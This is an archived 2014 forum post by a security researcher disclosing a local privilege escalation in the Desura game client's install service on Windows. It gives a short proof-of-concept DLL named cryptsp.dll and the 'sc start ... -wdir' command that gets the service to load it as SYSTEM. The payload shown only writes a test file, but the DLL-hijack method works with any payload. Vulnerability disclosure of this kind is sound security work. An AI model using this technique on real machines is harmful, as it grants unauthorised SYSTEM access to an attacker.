This topic was archived here:

https://web.archive.org/web/20230000000000fw_/https://www.zenhax.com/viewtopic.php?t=81

aluigi, posted Fri Aug 15, 2014 7:33 pm (185)

---

The following was a quick test I made in the far October 2012 and it's still working.

"Desura is a digital distribution platform developed by Linden Research":
http://www.desura.com

Basically it's a competitor of Steam that, I remember, was mainly focused on indie games and then has been bought by Linden, the guys behind Second Life.

Anyway it's just a local privilege escaltion to become SYSTEM by using an option of the installer service, not so important but interesting to show.

Compile a dll with the name cryptsp.dll, the following is a quick example of dll for testing if you are able to write in a folder that requires Administrator privileges:

Code:

#include 
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {
    if(ulReason == DLL_PROCESS_ATTACH) {
        system("echo HELLO > c:\\windows\\poc.txt");
        Sleep(-1);
    }
    return TRUE;
}

Create an empty folder called bin and put the dll there.

Kill/close the Desura client if it's running.

Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll
Now start the service (any user can do that, just like with Steam) using the -wdir option:

Code:

sc start "Desura Install Service" -wdir z:\poc

That's all.

Source code of Desura Service:
https://github.com/desura/Desurium/blob ... ceMain.cpp

If you want to read about something similar for Steam:
http://revuln.com/files/ReVuln_Steam_Se ... curity.pdf